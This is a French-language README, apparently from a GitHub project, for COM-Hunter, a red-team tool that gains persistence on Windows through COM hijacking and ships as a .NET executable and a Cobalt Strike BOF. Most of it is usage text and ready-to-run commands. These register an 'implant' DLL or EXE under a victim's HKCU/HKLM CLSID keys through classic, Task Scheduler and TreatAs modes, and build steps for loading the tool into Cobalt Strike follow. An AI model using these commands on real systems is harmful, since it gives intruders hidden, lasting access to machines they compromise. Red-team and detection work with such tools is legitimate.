
Outil de persistance par détournement COM Windows avec modes recherche, classique, Planificateur de tâches et TreatAs. Disponible en tant qu'exécutable .NET et BOF Cobalt Strike pour les opérations d'équipe rouge.
COM Hijacking VOODOO

COM-Hunter est un outil de persistance par COM Hijacking.
Disponible en version .NET et en variante BOF entièrement compatible avec Cobalt Strike.
La liste suivante explique les modes disponibles :
LocalServer32, InprocServer32 et les entrées de registre sous HKLM et HKCU.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32, InprocServer32 et les entrées de registre associées sous et .ℹ️ Cet outil a été sélectionné et fait fièrement partie du Cobalt Strike Community Kit.
Si vous trouvez des bugs, n'hésitez pas à les signaler. Vos retours sont précieux pour améliorer la qualité de ce projet !
Les auteurs et contributeurs de ce projet ne sont pas responsables de toute utilisation illégale de l'outil. Il est destiné uniquement à des fins éducatives. Les utilisateurs sont responsables de garantir une utilisation conforme à la loi.
Ce projet a été créé avec ❤️ par @nickvourd && @S1ckB0y1337.
Un merci spécial à mon ami Marios Gyftos pour son aide précieuse lors de la phase de test bêta de cet outil.
Inspiré par le cours RTO de @zeropointsecltd.
L'implémentation BOF s'inspire de Lefteris Panos et de son excellent projet, RegPersist.
Les fichiers base.c et bofdefs.h sont des copies directes du projet CS-Situational-Awareness-BOF de TrustedSec.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ Recherche des implémentations DLL et EXE dans HKLM et HKCU :
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Recherche des implémentations EXE dans HKLM et HKCU :
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Recherche avancée des implémentations EXE dans HKLM :
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Recherche des implémentations EXE et DLL dans HKCU :
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Effectuer une persistance classique en utilisant une implémentation DLL :
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Effectuer une persistance classique en utilisant une implémentation EXE :
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Effectuer une persistance via le Planificateur de tâches en utilisant une implémentation DLL :
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Effectuer une persistance via la clé de registre TreatAs et un faux CLSID (redirigeable) en utilisant une implémentation DLL :
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Supprimer la persistance par implémentation DLL dans HKCU en utilisant :
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Chaîne d'outils MinGW-w64 requise (x86_64-w64-mingw32-gcc et i686-w64-mingw32-gcc)
ℹ️ Compilez les objets BOF pour les deux architectures :
./make_all.sh
Cela va :
com_hunter_*.com_hunter_*.x64.o et com_hunter_*.x86.o.com_hunter_*/.ℹ️ Après avoir compilé les modules BOF, il suffit de charger com_hunter_bof.cna dans Cobalt Strike.
ℹ️ Pour nettoyer les artefacts de construction, allez dans chaque répertoire src et exécutez :
make clean
HKLMHKCU